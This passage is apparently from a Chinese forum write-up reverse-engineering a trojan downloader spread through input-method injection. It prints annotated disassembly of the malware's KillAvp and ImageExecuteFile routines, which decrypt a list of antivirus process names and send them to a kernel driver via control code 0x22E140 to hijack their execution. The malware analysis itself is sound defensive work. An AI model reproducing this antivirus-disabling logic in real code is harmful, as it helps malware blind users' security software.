.text:100023F0 call GetProcAddressByHashValue ; 获取CloseHandle函数地址
.text:100023F5 push edi
.text:100023F6 call eax ; CloseHandle
.text:100023F8 push eax
.text:100023F9 nop
.text:100023FA pop eax
.text:100023FB pop edi
.text:100023FC pop esi
.text:100023FD xor eax, eax
.text:100023FF pop ebx
.text:10002400 mov esp, ebp
.text:10002402 pop ebp
.text:10002403 retn
.text:10002403 KillAvp endp
进入 call ImageExecuteFile
依次访问并解码安全软件的进程名字符串数组（lpSafeProcList，每项为 4 字节指针，循环直到 dword_1000124C 为止）
将解密后的进程名拼接上 szExe 后缀并转换为 Unicode，再通过 DeviceIoControl 向驱动句柄 hDriver 发送控制码 0x22E140 实现映像劫持（劫持的具体实现位于驱动中，用户态只能看到控制码以及作为输入缓冲区的 Unicode 进程名和其字节长度）
.text:10001A3F
.text:10001A3F loc_10001A3F: ; CODE XREF: ImageExecuteFile+124j
.text:10001A3F mov ecx, 3Fh
.text:10001A44 xor eax, eax
.text:10001A46 lea edi, [ebp+MultiByteStr]
.text:10001A4C rep stosd
.text:10001A4E stosw
.text:10001A50 stosb
.text:10001A51 nop
.text:10001A52 mov eax, [ebp+lpSafeProcList]
.text:10001A55 mov esi, lstrcpyA
.text:10001A5B lea edx, [ebp+MultiByteStr]
.text:10001A61 mov ecx, [eax] ; 取出一个安全进程命名
.text:10001A63 push ecx ; lpString2
.text:10001A64 push edx ; lpString1
.text:10001A65 call esi ; lstrcpyA
.text:10001A67 nop
.text:10001A68 lea eax, [ebp+MultiByteStr]
.text:10001A6E push eax ; lpString
.text:10001A6F call DecryProcName ; 解密进程名
.text:10001A74 add esp, 4
.text:10001A77 lea ecx, [ebp+MultiByteStr]
.text:10001A7D push eax ; lpString2
.text:10001A7E push ecx ; lpString1
.text:10001A7F call esi ; lstrcpyA ; 复制解密后的字符串
.text:10001A81 nop
.text:10001A82 lea edx, [ebp+szExe]
.text:10001A85 lea eax, [ebp+MultiByteStr]
.text:10001A8B push edx ; lpString2
.text:10001A8C push eax ; lpString1
.text:10001A8D call lstrcatA ; 构建完整的进程名
.text:10001A93 nop
.text:10001A94 push 0 ; cchWideChar
.text:10001A96 push 0 ; lpWideCharStr
.text:10001A98 lea ecx, [ebp+MultiByteStr]
.text:10001A9E push -1 ; cbMultiByte
.text:10001AA0 push ecx ; lpMultiByteStr
.text:10001AA1 push 1 ; dwFlags
.text:10001AA3 push 0 ; CodePage
.text:10001AA5 call MultiByteToWideChar ; 计算出进程名长度
.text:10001AAB lea ebx, [eax+eax] ; 进程名长度*2
.text:10001AAE mov [ebp+WideCharSize], eax
.text:10001AB1 push ebx ; dwBytes
.text:10001AB2 push 40h ; uFlags
.text:10001AB4 call GlobalAlloc ; 分配宽字符进程名的空间
.text:10001ABA mov esi, eax
.text:10001ABC test esi, esi
.text:10001ABE jz short loc_10001B0F ; 分配失败跳走
.text:10001AC0 mov ecx, ebx
.text:10001AC2 xor eax, eax
.text:10001AC4 mov edx, ecx
.text:10001AC6 mov edi, esi
.text:10001AC8 shr ecx, 2
.text:10001ACB rep stosd ; 分配的空间内存清0
.text:10001ACD mov ecx, edx
.text:10001ACF and ecx, 3
.text:10001AD2 rep stosb
.text:10001AD4 mov eax, [ebp+WideCharSize]
.text:10001AD7 lea ecx, [ebp+MultiByteStr]
.text:10001ADD push eax ; cchWideChar
.text:10001ADE push esi ; lpWideCharStr
.text:10001ADF push -1 ; cbMultiByte
.text:10001AE1 push ecx ; lpMultiByteStr
.text:10001AE2 push 1 ; dwFlags
.text:10001AE4 push 0 ; CodePage
.text:10001AE6 call MultiByteToWideChar ; 进程名转换成Unicode字符
.text:10001AEC push 82E8173h
.text:10001AF1 push 1
.text:10001AF3 call GetProcAddressByHashValue ; 获取DeviceIoControl进程地址
.text:10001AF8 向 hDriver 发送控制码 0x22E140 实现映像劫持：输入缓冲区为 Unicode 进程名(esi)，长度为 ebx 字节
.text:10001AF8 mov ecx, [ebp+hDriver]
.text:10001AFB lea edx, [ebp+BytesReturned]
.text:10001AFE push 0
.text:10001B00 push edx
.text:10001B01 push 0
.text:10001B03 push 0
.text:10001B05 push ebx
.text:10001B06 push esi
.text:10001B07 push 22E140h
.text:10001B0C push ecx
.text:10001B0D call eax ; DeviceIoControl
.text:10001B0F
.text:10001B0F loc_10001B0F: ; CODE XREF: ImageExecuteFile+BEj
.text:10001B0F push esi ; hMem
.text:10001B10 call GlobalFree
.text:10001B16 mov eax, [ebp+lpSafeProcList]
.text:10001B19 add eax, 4
.text:10001B1C cmp eax, offset dword_1000124C
.text:10001B21 mov [ebp+lpSafeProcList], eax
.text:10001B24 jl loc_10001A3F ; 未到进程列表未尾继续循环
输入法注入的木马下载器完全逆向与分析
http://bbs.pediy.com/showthread.php?p=832346#post832346